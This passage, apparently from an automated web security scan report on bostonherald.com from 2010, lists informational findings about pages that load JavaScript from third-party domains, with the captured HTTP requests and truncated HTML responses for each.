http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121

Request

GET /homepage.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:43:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 152294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.60. http://bostonherald.com/includes/PointRollAds.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/includes/PointRollAds.htm

Issue detail

The response dynamically includes the following script from another domain:

http://psf.pointroll.com/pointroll/script/psf.js

Request

Response

9.61. http://bostonherald.com/index.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/index.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121

Request

GET /index.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:41:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 152294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.62. http://bostonherald.com/intra/hashtag/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/intra/hashtag/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /intra/hashtag/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 404 Not Found
Date: Mon, 08 Nov 2010 03:22:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.63. http://bostonherald.com/jobfind/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/jobfind/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://edge.quantserve.com/quant.js

Request

GET /jobfind/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:52:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // jobfind/index.tmpl
...[SNIP]...
<link rel="alternate" title="Jobfind - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/jobfind/" type="application/rss+xml">

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
   <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<form name="newsearchform" method="get" action="http://jobfind.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp" onsubmit="return gotoTitleSelect();"><script language="javascript" src="http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.64. http://bostonherald.com/jobfind/news/healthcare/view/20101107maine_pine_needles_yield_valuable_tamiflu_material/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/jobfind/news/healthcare/view/20101107maine_pine_needles_yield_valuable_tamiflu_material/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /jobfind/news/healthcare/view/20101107maine_pine_needles_yield_valuable_tamiflu_material/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:31:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.65. http://bostonherald.com/jobfind/news/media/view/20101105nbc_suspends_keith_olbermann_for_political_donations/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/jobfind/news/media/view/20101105nbc_suspends_keith_olbermann_for_political_donations/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /jobfind/news/media/view/20101105nbc_suspends_keith_olbermann_for_political_donations/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.66. http://bostonherald.com/jobfind/news/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/jobfind/news/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /jobfind/news/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:30:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.67. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:29:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
